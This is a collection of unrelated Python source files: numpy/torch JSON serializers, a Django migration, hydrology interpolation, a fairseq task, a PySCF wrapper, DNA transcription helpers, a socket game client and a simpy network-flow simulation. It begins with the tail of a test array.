0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]],
dtype=np.float32)
test(X, expected_X)
test(A, expected_A)
test(E, expected_E)
except ImportError:
print("Unable to use pyrosetta. Did you call init?")
|
#!/usr/bin/env python
#
# json_serializers.py
# Contains JSON (de)serializers for:
# torch.Tensor
# numpy.ndarray
# numpy.dtype
# numpy.floating
# numpy.integer
from __future__ import print_function
import six
import json
import base64
import io
import numpy as np
import torch
def deserialize_tuple(d):
"""
Deserializes a JSONified tuple.
Args:
d (:obj:`dict`): A dictionary representation of the tuple.
Returns:
A tuple.
"""
return tuple(d['items'])
def serialize_dtype(o):
"""
Serializes a :obj:`numpy.dtype`.
Args:
o (:obj:`numpy.dtype`): :obj:`dtype` to be serialized.
Returns:
A dictionary that can be passed to :obj:`json.dumps`.
"""
if len(o) == 0:
return dict(
_type='np.dtype',
descr=str(o))
return dict(
_type='np.dtype',
descr=o.descr)
# res = []
# for k in range(len(o)):
# res.append((o.names[k], str(o[k])))
# return dict(
# _type='np.dtype',
# desc=res)
def deserialize_dtype(d):
"""
Deserializes a JSONified :obj:`numpy.dtype`.
Args:
d (:obj:`dict`): A dictionary representation of a :obj:`dtype` object.
Returns:
A :obj:`dtype` object.
"""
if isinstance(d['descr'], six.string_types):
return np.dtype(d['descr'])
descr = []
for col in d['descr']:
col_descr = []
for c in col:
if isinstance(c, six.string_types):
col_descr.append(str(c))
elif type(c) is list:
col_descr.append(tuple(c))
else:
col_descr.append(c)
descr.append(tuple(col_descr))
return np.dtype(descr)
def serialize_ndarray_b64(o):
"""
Serializes a :obj:`numpy.ndarray` in a format where the datatype and shape are
human-readable, but the array data itself is binary64 encoded.
Args:
o (:obj:`numpy.ndarray`): :obj:`ndarray` to be serialized.
Returns:
A dictionary that can be passed to :obj:`json.dumps`.
"""
if o.flags['C_CONTIGUOUS']:
o_data = o.data
else:
o_data = np.ascontiguousarray(o).data
data_b64 = base64.b64encode(o_data)
return dict(
_type='np.ndarray',
data=data_b64.decode('utf-8'),
dtype=o.dtype,
shape=o.shape)
def hint_tuples(o):
"""
Annotates tuples before JSON serialization, so that they can be
reconstructed during deserialization. Each tuple is converted into a
dictionary of the form:
{'_type': 'tuple', 'items': (...)}
This function acts recursively on lists, so that tuples nested inside a list
(or doubly nested, triply nested, etc.) will also be annotated.
"""
if isinstance(o, tuple):
return dict(_type='tuple', items=o)
elif isinstance(o, list):
return [hint_tuples(el) for el in o]
else:
return o
def serialize_ndarray_readable(o):
"""
Serializes a :obj:`numpy.ndarray` in a human-readable format.
Args:
o (:obj:`numpy.ndarray`): :obj:`ndarray` to be serialized.
Returns:
A dictionary that can be passed to :obj:`json.dumps`.
"""
return dict(
_type='np.ndarray',
dtype=o.dtype,
value=hint_tuples(o.tolist()))
def serialize_ndarray_npy(o):
"""
Serializes a :obj:`numpy.ndarray` using numpy's built-in :obj:`save` function.
This produces totally unreadable (and very un-JSON-like) results (in "npy"
format), but it's basically guaranteed to work in 100% of cases.
Args:
o (:obj:`numpy.ndarray`): :obj:`ndarray` to be serialized.
Returns:
A dictionary that can be passed to :obj:`json.dumps`.
"""
with io.BytesIO() as f:
np.save(f, o)
f.seek(0)
serialized = json.dumps(f.read().decode('latin-1'))
return dict(
_type='np.ndarray',
npy=serialized)
def deserialize_ndarray_npy(d):
"""
Deserializes a JSONified :obj:`numpy.ndarray` that was created using numpy's
:obj:`save` function.
Args:
d (:obj:`dict`): A dictionary representation of an :obj:`ndarray` object, created
using :obj:`numpy.save`.
Returns:
An :obj:`ndarray` object.
"""
with io.BytesIO() as f:
f.write(json.loads(d['npy']).encode('latin-1'))
f.seek(0)
return np.load(f)
def deserialize_ndarray(d):
"""
Deserializes a JSONified :obj:`numpy.ndarray`. Can handle arrays serialized
using any of the methods in this module: :obj:`"npy"`, :obj:`"b64"`,
:obj:`"readable"`.
Args:
d (`dict`): A dictionary representation of an :obj:`ndarray` object.
Returns:
An :obj:`ndarray` object.
"""
if 'data' in d:
x = np.fromstring(
base64.b64decode(d['data']),
dtype=d['dtype'])
x.shape = d['shape']
return x
elif 'value' in d:
return np.array(d['value'], dtype=d['dtype'])
elif 'npy' in d:
return deserialize_ndarray_npy(d)
else:
raise ValueError('Malformed np.ndarray encoding.')
def serialize_torch_tensor(o):
return dict(
_type="torch.Tensor",
data=o.numpy()
)
def deserialize_torch_tensor(d):
return torch.from_numpy(d['data'])
def serialize_quantity(o):
"""
Serializes an :obj:`astropy.units.Quantity`, for JSONification.
Args:
o (:obj:`astropy.units.Quantity`): :obj:`Quantity` to be serialized.
Returns:
A dictionary that can be passed to :obj:`json.dumps`.
"""
return dict(
_type='astropy.units.Quantity',
value=o.value,
unit=o.unit.to_string())
def deserialize_quantity(d):
"""
Deserializes a JSONified :obj:`astropy.units.Quantity`.
Args:
d (:obj:`dict`): A dictionary representation of a :obj:`Quantity` object.
Returns:
A :obj:`Quantity` object.
"""
return units.Quantity(
d['value'],
unit=d['unit'])
def serialize_skycoord(o):
"""
Serializes an :obj:`astropy.coordinates.SkyCoord`, for JSONification.
Args:
o (:obj:`astropy.coordinates.SkyCoord`): :obj:`SkyCoord` to be serialized.
Returns:
A dictionary that can be passed to :obj:`json.dumps`.
"""
representation = o.representation.get_name()
frame = o.frame.name
r = o.represent_as('spherical')
d = dict(
_type='astropy.coordinates.SkyCoord',
frame=frame,
representation=representation,
lon=r.lon,
lat=r.lat)
if len(o.distance.unit.to_string()):
d['distance'] = r.distance
return d
def deserialize_skycoord(d):
"""
Deserializes a JSONified :obj:`astropy.coordinates.SkyCoord`.
Args:
d (:obj:`dict`): A dictionary representation of a :obj:`SkyCoord` object.
Returns:
A :obj:`SkyCoord` object.
"""
if 'distance' in d:
args = (d['lon'], d['lat'], d['distance'])
else:
args = (d['lon'], d['lat'])
return coords.SkyCoord(
*args,
frame=d['frame'],
representation='spherical')
def get_encoder(ndarray_mode='b64'):
"""
Returns a JSON encoder that can handle:
* :obj:`numpy.ndarray`
* :obj:`numpy.floating` (converted to :obj:`float`)
* :obj:`numpy.integer` (converted to :obj:`int`)
* :obj:`numpy.dtype`
* :obj:`astropy.units.Quantity`
* :obj:`astropy.coordinates.SkyCoord`
Args:
ndarray_mode (Optional[:obj:`str`]): Which method to use to serialize
:obj:`numpy.ndarray` objects. Defaults to :obj:`'b64'`, which converts the
array data to binary64 encoding (non-human-readable), and stores the
datatype/shape in human-readable formats. Other options are
:obj:`'readable'`, which produces fully human-readable output, and
:obj:`'npy'`, which uses numpy's built-in :obj:`save` function and
produces completely unreadable output. Of all the methods :obj:`'npy'`
is the most reliable, but also least human-readable. :obj:`'readable'`
produces the most human-readable output, but is the least reliable
and loses precision.
Returns:
A subclass of :obj:`json.JSONEncoder`.
"""
# Use specified numpy.ndarray serialization mode
serialize_fns = {
'b64': serialize_ndarray_b64,
'readable': serialize_ndarray_readable,
'npy': serialize_ndarray_npy}
if ndarray_mode not in serialize_fns:
raise ValueError('"ndarray_mode" must be one of {}'.format(
serialize_fns.keys))
serialize_ndarray = serialize_fns[ndarray_mode]
class MultiJSONEncoder(json.JSONEncoder):
"""
A JSON encoder that can handle:
* :obj:`numpy.ndarray`
* :obj:`numpy.floating` (converted to :obj:`float`)
* :obj:`numpy.integer` (converted to :obj:`int`)
* :obj:`numpy.dtype`
"""
def default(self, o):
if isinstance(o, torch.Tensor):
return serialize_torch_tensor(o)
elif isinstance(o, np.ndarray):
return serialize_ndarray(o)
elif isinstance(o, np.dtype):
return serialize_dtype(o)
elif isinstance(o, np.floating):
return float(o)
elif isinstance(o, np.integer):
return int(o)
elif isinstance(o, np.bool_):
return bool(o)
elif isinstance(o, np.void):
try:
o = np.array(o)
except:
pass
else:
return o
return json.JSONEncoder.default(self, o)
return MultiJSONEncoder
class MultiJSONDecoder(json.JSONDecoder):
"""
A JSON decoder that can handle:
* :obj:`numpy.ndarray`
* :obj:`numpy.dtype`
"""
def __init__(self, *args, **kwargs):
json.JSONDecoder.__init__(
self,
object_hook=self.object_hook,
*args,
**kwargs)
def object_hook(self, d):
if isinstance(d, dict):
if ('_type' in d):
if d['_type'] == 'torch.Tensor':
return deserialize_torch_tensor(d)
elif d['_type'] == 'np.ndarray':
return deserialize_ndarray(d)
elif d['_type'] == 'np.dtype':
return deserialize_dtype(d)
elif d['_type'] == 'tuple':
return deserialize_tuple(d)
return d
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0028_auto_20151222_1711'),
]
operations = [
migrations.AddField(
model_name='customer',
name='contact',
field=models.CharField(max_length=20, null=True, verbose_name='\u8054\u7cfb\u4eba', blank=True),
),
migrations.AddField(
model_name='customer',
name='email',
field=models.EmailField(max_length=20, null=True, verbose_name='\u90ae\u7bb1', blank=True),
),
migrations.AddField(
model_name='customer',
name='emergency_contact',
field=models.CharField(max_length=20, null=True, verbose_name='\u7d27\u6025\u8054\u7cfb\u4eba', blank=True),
),
migrations.AddField(
model_name='customer',
name='emergency_mobile',
field=models.CharField(max_length=20, null=True, verbose_name='\u7d27\u6025\u8054\u7cfb\u4eba\u624b\u673a', blank=True),
),
migrations.AddField(
model_name='customer',
name='mobile',
field=models.CharField(max_length=20, null=True, verbose_name='\u8054\u7cfb\u4eba\u624b\u673a', blank=True),
),
]
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 26 11:15:35 2019
@author: michaelek
"""
import os
import pandas as pd
from hydrointerp import Interp
from ecandbparams import sql_arg
from pdsql import mssql
import parameters as param
import eto_estimates as eto
pd.options.display.max_columns = 10
###################################
### Parameters
sql1 = sql_arg()
swaz_gis_dict = sql1.get_dict('swaz_gis')
## Selection of specific SWAZ groups - remove for final method
where_in = {'where_in': {'ZONE_GROUP_NAME': param.swaz_grps}}
swaz_gis_dict.update(where_in)
eto_swaz_csv = 'eto_swaz_{}.csv'.format(param.run_time)
#################################
### Estimate ETo at swaz locations
print('ETo at swaz locations')
try:
swaz_eto = pd.read_csv(os.path.join(param.inputs_path, eto_swaz_csv), parse_dates=['time'], infer_datetime_format=True)
print('-> loaded from local file')
except:
print('-> Estimate ETo at SWAZs via spatial interp')
## Read in data
print('Read in SWAZ data')
swaz1 = mssql.rd_sql(**swaz_gis_dict)
swaz2 = swaz1.drop('geometry', axis=1).copy()
swaz2['x'] = swaz1.centroid.x
swaz2['y'] = swaz1.centroid.y
## Estimate ETo
eto1 = eto.eto0[(eto.eto0.time >= param.from_date) & (eto.eto0.time <= param.to_date)].copy()
interp1 = Interp(eto1, 'time', 'x', 'y', 'ETo', 4326)
swaz_eto1 = interp1.points_to_points(swaz2, 2193, method='cubic', min_val=0)
swaz_eto = pd.merge(swaz2, swaz_eto1.reset_index(), on=['x', 'y'])
swaz_eto.to_csv(os.path.join(param.inputs_path, eto_swaz_csv), index=False)
#################################
### Testing
#df = eto.eto0.copy()
#time_name = 'time'
#x_name = 'x'
#y_name = 'y'
#data_name = 'ETo'
#point_data = swaz2.copy()
#from_crs = 4326
#to_crs = 2193
#method = 'linear'
#digits = 2
#min_val = None
#swaz_etpo1 = points_to_points(eto.eto0, 'time', 'x', 'y', 'ETo', swaz2, 4326, 2193)
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
from fairseq.tasks import register_task
from fairseq.tasks.joint_task import JointTrainingTask
logger = logging.getLogger(__name__)
@register_task("joint_task_mtst")
class JointTrainingMTSTTask(JointTrainingTask):
st_task = 'task_st.yaml'
mt_task = 'task_mt.yaml'
main_task = mt_task
@staticmethod
def add_args(parser):
JointTrainingTask.add_args(parser)
parser.add_argument(
'--other-unshare-modules',
nargs='+', type=str,
choices=['encoder-transformers', 'decoder-transformers',
'interlingua-transformers'],
default=[],
)
def __init__(self, args, tasks, task_configs, main_task_name):
super().__init__(args, tasks, task_configs, main_task_name)
self.other_unshare_modules = args.other_unshare_modules
self.state = self.main_task
def resetup(self, args):
self.other_unshare_modules = args.other_unshare_modules
def shift_model(self, task_name, model):
st_model = model[self.st_task]
mt_model = model[self.mt_task]
if task_name == self.st_task:
self.cache_module(
'mt_decoder_embedding', 'embed_tokens',
mt_model.decoder, st_model.decoder
)
self.cache_module(
'mt_decoder_projection', 'output_projection',
mt_model.decoder, st_model.decoder
)
if 'encoder-transformers' in self.other_unshare_modules:
self.cache_module(
'mt_encoder_transformers', 'transformer_layers',
mt_model.encoder, st_model.encoder
)
if 'decoder-transformers' in self.other_unshare_modules:
self.cache_module(
'mt_decoder_transformers', 'layers',
mt_model.decoder, st_model.decoder
)
if 'interlingua-transformers' in self.other_unshare_modules:
self.cache_module(
'mt_interlingua_transformers', 'interlingua_layers',
mt_model.encoder, st_model.encoder
)
self.state = self.st_task
elif task_name == self.mt_task:
pass
else:
raise Exception()
def shift_model_back(self, task_name, model):
mt_model = model[self.mt_task]
if task_name == self.st_task:
self.cache_module_recover(
'mt_decoder_embedding', 'embed_tokens',
mt_model.decoder
)
self.cache_module_recover(
'mt_decoder_projection', 'output_projection',
mt_model.decoder
)
if 'encoder-transformers' in self.other_unshare_modules:
self.cache_module_recover(
'mt_encoder_transformers', 'transformer_layers',
mt_model.encoder,
)
if 'decoder-transformers' in self.other_unshare_modules:
self.cache_module_recover(
'mt_decoder_transformers', 'layers',
mt_model.decoder
)
if 'interlingua-transformers' in self.other_unshare_modules:
self.cache_module_recover(
'mt_interlingua_transformers', 'interlingua_layers',
mt_model.encoder
)
self.state = self.mt_task
elif task_name == self.mt_task:
pass
else:
raise Exception()
|
""" Make a list of people who should take the favorite
languages poll and then loop through the list and find
some new member for the poll """
favorite_languages = {
'jen': 'python',
'sarah': 'c',
'edward': 'ruby',
'phil': 'python',
}
names = ['james', 'sarah', 'carolina', 'edward', 'cynthya']
for name in names:
if name in favorite_languages:
print(f'Thanks {name.title()} for responding')
else:
print(f'Hi {name.title()} would you like to take the poll?') |
class Solution:
def findNumbers(self, nums: List[int]) -> int:
max1 = 0
for i in nums:
count = 0
while(i):
i = i // 10
count += 1
if not (count % 2):
max1 += 1
return max1
|
import sys
from classFinder import *
if len(sys.argv) != 2:
print "Parses documentation to find commands for each kind of commandable object"
print "Usage: %s <javadoc dir>"%(sys.argv[0])
sys.exit()
docDir=sys.argv[1]
# Look for all classes
lib=ClassLibrary()
lib.findClasses(docDir)
## Get all extensions of BaseStatistics
stats = lib.getCompleteSubclasses("BaseModel")
print [ x.name for x in stats ]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name='librarywatch',
version='1.0.1',
description='A utility to check PyPi for updates to currently installed packages',
author='Jeff Triplett / Adam Fast',
author_email='adamfast@gmail.com',
url='https://github.com/adamfast/django-librarywatch',
packages=find_packages(),
package_data={
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities'
],
)
|
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division
import numpy as np
from ctypes import POINTER, c_float, c_int64
from pyscf.nao.m_libnao import libnao
libnao.c_csr_bloch_mat.argtypes = (
POINTER(c_int64), # r2s ! row -> start index in data and cols arrays
POINTER(c_int64), # nrows ! number of rows (number of orbitals in unit cell)
POINTER(c_int64), # i2col ! index -> column
POINTER(c_float), # i2dat ! index -> data element
POINTER(c_float), # i2xyz ! index -> coordinate difference
POINTER(c_int64), # nnz ! number of non-zero matrix elements (maximal index)
POINTER(c_int64), # orb_sc2orb_uc ! orbital in Super Cell -> orbital in Unit cell correspondence
POINTER(c_int64), # norbs_sc ! size of the previous array
POINTER(c_float), # kvec ! Cartesian coordinates of a k-vector
POINTER(c_float*2)) # cmat ! Bloch matrix (nrows,nrows)
def siesta_hsx_bloch_mat(csr, hsx, kvec=np.array([0.0,0.0,0.0])):
assert csr.nnz==hsx.x4.shape[0]
assert hsx.norbs==len(csr.indptr)-1
r2s = np.require( csr.indptr, dtype=np.int64, requirements='C')
i2col = np.require( csr.indices, dtype=np.int64, requirements='C')
i2dat = np.require( csr.data, dtype=np.float32, requirements='C')
i2xyz = np.require( hsx.x4, dtype=np.float32, requirements='C')
osc2o = np.require( hsx.orb_sc2orb_uc, dtype=np.int64, requirements='C')
kvecc = np.require( kvec, dtype=np.float32, requirements='C')
cmat = np.require( np.zeros((hsx.norbs,hsx.norbs), dtype=np.complex64), requirements='CW')
libnao.c_csr_bloch_mat( r2s.ctypes.data_as(POINTER(c_int64)),
c_int64(hsx.norbs),
i2col.ctypes.data_as(POINTER(c_int64)),
i2dat.ctypes.data_as(POINTER(c_float)),
i2xyz.ctypes.data_as(POINTER(c_float)),
c_int64(csr.nnz),
osc2o.ctypes.data_as(POINTER(c_int64)),
c_int64(hsx.norbs_sc),
kvecc.ctypes.data_as(POINTER(c_float)),
cmat.ctypes.data_as(POINTER(c_float*2))
)
return cmat
#
#
#
def siesta_hsx_bloch_mat_py(csr, hsx, kvec=[0.0,0.0,0.0], prec=64):
assert(type(prec)==int)
assert csr.nnz==hsx.x4.shape[0]
assert hsx.norbs==len(csr.indptr)-1
caux = np.exp(1.0j*np.dot(hsx.x4,kvec)) * csr.data
den_bloch = np.zeros((hsx.norbs,hsx.norbs), dtype='complex'+str(2*prec))
for row in range(hsx.norbs):
for ind in range(csr.indptr[row], csr.indptr[row+1]):
col = hsx.orb_sc2orb_uc[csr.indices[ind]]
den_bloch[col,row]=den_bloch[col,row]+caux[ind]
return den_bloch
|
# DNA -> RNA Transcription
def transcribe(seq: str) -> str:
"""
transcribes DNA to RNA by generating
the complement sequence with T -> U replacement
"""
seq_list = list(seq)
for i in range(len(seq_list)):
if seq_list[i] == 'A':
seq_list[i] = 'U'
elif seq_list[i] == 'T':
seq_list[i] = 'A'
elif seq_list[i] == 'C':
seq_list[i] = 'G'
else:
seq_list[i] = 'C'
transcribe_str = ''.join(seq_list)
return transcribe_str
def reverse_transcribe(seq: str) -> str:
"""
transcribes DNA to RNA then reverses
the strand
"""
rev_transcribe_str = transcribe(seq)
rev_list = list(rev_transcribe_str)
for i in range(len(rev_list)):
if rev_list[i] == 'A':
rev_list[i] = 'U'
elif rev_list[i] == 'U':
rev_list[i] = 'A'
elif rev_list[i] == 'C':
rev_list[i] = 'G'
else:
rev_list[i] = 'C'
final_str = ''.join(rev_list)
return final_str
|
# -*- coding: UTF-8 -*-
from GameMessage import Message
from Core import Packer
import asyncore, socket
import threading
import time
import sys
import Setting
MESSAGES = []
class ClientInput(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.is_inputing = False
self.stop = False
def run(self):
while not self.stop:
self.is_inputing = True
line = raw_input(">>> ")
self.is_inputing = False
MESSAGES.append(line)
time.sleep(0.01)
INPUT = ClientInput()
INPUT.daemon = True
INPUT.start()
class GameClient(asyncore.dispatcher):
def __init__(self, con_params):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connetc_params = con_params
self.set_reuse_addr()
self.connect(con_params)
self.buffer = Packer.pack_msg(Message.MS_Connect, 1)
def handle_connect(self):
print("connection is success")
def handle_close(self):
self.close()
def handle_read(self):
if not INPUT.is_inputing:
recvs = self.recv(8192)
if not recvs:
return
print("server:"+recvs)
def writable(self):
if self.buffer == '' and MESSAGES:
self.buffer = MESSAGES.pop(0)
return len(self.buffer) > 0
def handle_write(self):
sent = self.send(self.buffer)
self.buffer = self.buffer[sent:]
def handle_close(self):
INPUT.stop = True
print("Client Socket is closing")
self.close()
sys.exit()
# 这里链接主网关进程
client = GameClient(Setting.GateServer)
asyncore.loop(timeout=0.001)
|
# This class expects to be useless, except from the point
# of storytelling. It tells you the story that you can use
# all the nice pytest fixtures from Kotti itself in your
# tests without the need of deriving from UnitTestCase.
# The db_session parameter is a fixture, defined in here:
# https://github.com/Pylons/Kotti/blob/master/kotti/tests/configure.py
# If you don't know about pytest fixtures, take a deeper
# look here: http://pytest.org/latest/fixture.html.
class TestExample:
def test_root(self, db_session):
from kotti.resources import get_root
root = get_root()
assert root is not None
|
from functools import partial, wraps
import simpy
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import time
def trace(env, callback):
def get_wrapper(env_step, callback):
@wraps(env_step)
def tracing_step():
if len(env._queue):
t, prio, eid, event = env._queue[0]
callback(t, prio, eid, event)
return env_step()
return tracing_step
env.step = get_wrapper(env.step, callback)
def monitor(data, t, prio, eid, event):
data.append((t, eid, type(event)))
class WorkFlow:
def __init__(self,topology,name):
self.topology = topology
self.name = name
self.debug = False
self.info = True
def receive(self,packet):
return
def start(self):
return
def failed(self, packet,net_elem):
return
def reset(self):
return
class DataTransfer(WorkFlow):
def __init__(self,name,src,dst,topology,data_size,max_rate,path=None,increase=None,decrease=None,tick_rtt=False):
WorkFlow.__init__(self,topology=topology, name=name)
self.env = self.topology.env
self.data_size = data_size
self.path = path
self.max_rate = max_rate
self.increase = increase
self.src = src
self.dst = dst
if self.increase == None:
self.increase = self.increase_default
self.decrease = decrease
if self.decrease == None:
self.decrease = self.decrease_default
if self.path == None:
src_port = self.src.all_ports.values()[0]
dst_port = self.dst.all_ports.values()[0]
g = self.topology.get_graph()
self.path = nx.shortest_path(g, src_port, dst_port)
self.graph = g
self.tick_rtt = tick_rtt
self.rtt = self.topology.rtt(self.path)
self.reset()
self.record_receive = False
self.record_drop = False
self.topology.env.process(self.rtt_tick())
def reset(self):
self.received = 0
self.packet_drop = 0
self.packet_total = 0
self.completed = False
self.increase_step = int(np.ceil(float(self.max_rate) * 0.1 / self.topology.ticks_per_sec))
self.current_rate = self.increase_step
self.start_time = self.topology.now()
self.end_time = 0
self.receive_data = []
self.drop_data = []
self.recourd_drop = False
self.congested = False
self.ticks_per_sec = self.topology.ticks_per_sec
self.tick_duration = self.topology.tick_millis
if self.tick_rtt:
self.tick_duration = self.rtt
self.ticks_per_sec = int(np.ceil(float(1000)/self.tick_rtt))
self.ticks_per_sec = max (self.ticks_per_sec,1)
self.tick_duration = max (self.tick_duration, self.topology.tick_millis)
self.max_rate_per_tick = int(np.ceil(float(self.max_rate) / self.ticks_per_sec))
self.rate_per_tick = int(np.ceil(float(self.current_rate) / self.ticks_per_sec))
self.free_packets=[]
def rtt_tick(self):
last_info = self.topology.now()
last_receive = self.received
while True:
yield self.topology.timeout(self.rtt)
if self.debug:
since_last = (self.topology.now() - last_receive) / 1000
if since_last > 10:
since_last - self.topology.now()
rate = (self.received - last_receive) / since_last
last_receive = self.received
percent_received=(float(self.received)/self.data_size)*100
print "time:", self.topology.now(),"flow:",self.name,"% received:",percent_received,"speed:",rate
if self.completed:
return
if not self.congested:
self.increase()
def increase_default(self):
rate = min (self.current_rate + self.increase_step, self.max_rate)
if rate != self.current_rate:
self.current_rate = rate
self.rate_per_tick = int(np.ceil(float(self.current_rate) / self.ticks_per_sec))
def decrease_default(self):
rate = max (self.current_rate / 2, self.increase_step)
if rate != self.current_rate:
self.current_rate = rate
self.rate_per_tick = int(np.ceil(float(self.current_rate) / self.ticks_per_sec))
def computes_stats(self):
current_time = self.end_time
if not self.completed:
current_time = self.topology.now()
self.elapse_time = (current_time - self.start_time) / 1000
self.average = self.data_size / self.elapse_time
def receive(self,packet):
self.free_packets.append(packet)
if self.completed:
return
self.received += packet.size
if self.debug: print self.topology.now(),self.name,"packet received",packet.name,packet.size,self.received
if self.record_receive: self.receive_data.append([self.topology.now(),packet.size*self.topology.ticks_per_sec])
if (self.received >= self.data_size):
self.completed = True
self.end_time = self.topology.now()
self.computes_stats()
if self.info: print "time:",self.elapse_time,'secs',self.name,'rtt:', self.rtt,'average',self.average,'drop',self.packet_drop
def start(self):
#import pdb; pdb.set_trace()
self.reset()
if self.info: print self.topology.now(),"start file transfer",self.name
self.free_packets=[]
while not self.completed:
packet_size = min(self.rate_per_tick,self.data_size - self.received, self.max_rate_per_tick)
packet_name = self.name+"-"+str(self.packet_total + 1)
packet = None
if len(self.free_packets) > 0:
packet = self.free_packets[0]
self.free_packets.remove(packet)
packet.size = packet_size
packet.name = packet_name
else:
packet = Packet(topology=self.topology, size=packet_size,flow=self,name=packet_name,path=self.path)
port_in = self.path[0]
port_in.router.forward(packet=packet, port_in=port_in)
self.packet_total += 1
yield self.topology.timeout(self.tick_duration)
def failed(self, packet,net_elem):
if self.completed:
self.free_packets.append(packet)
return
if net_elem != None:
if self.debug: print self.topology.now(),self.name,"drop packet ",packet.name ,"at",net_elem.name
else:
if self.debug: print self.topology.now(),self.name,"drop packet ",packet.name ,'broken link'
if self.record_drop:
self.drop_data.append([self.topology.now(),packet.size*self.topology.ticks_per_sec])
self.packet_drop += 1
if self.congested:
self.free_packets.append(packet)
return
self.congested = True
self.topology.env.process(self.do_failed(packet))
def do_failed(self, packet):
yield self.topology.timeout(self.rtt)
self.decrease()
self.congested = False
self.free_packets.append(packet)
def plot_receive(self):
x,y = zip(*self.receive_data)
plt.plot(x,y,label=self.name)
plt.plot(x,y)
plt.xlabel('milliseconds')
plt.ylabel('Mbps')
def plot_drop(self):
x,y = zip(*self.drop_data)
plt.plot(x,y,label=self.name + "drop")
plt.xlabel('milliseconds')
plt.ylabel('Nb of drops')
class Packet:
def __init__ (self,topology,name,size,flow,forward_map=None,path=[]):
self.topology = topology
self.env = topology.env
self.name = name
self.size = size
self.path = path
self.flow = flow
if forward_map != None:
self.forward_map = forward_map
else:
self.forward_map = self.compute_map()
def compute_map(self,path=None):
forward_map = {}
if path == None:
path = self.path
for port in path:
if self.topology.is_last_port(current_port=port, path=path):
forward_map[port.name] = None
else:
forward_map[port.name] = self.topology.next_port(current_port=port, path=path)
return forward_map
def receive(self):
self.flow.receive(self)
def failed(self,net_elem):
if self.flow != None:
self.flow.failed(packet=self,net_elem=net_elem)
def __str__(self):
return self.name
def __repr__(self):
return self.__str__()
class Router:
def __init__(self,name,topology=None,capacity=None):
self.topology = topology
self.env = topology.env
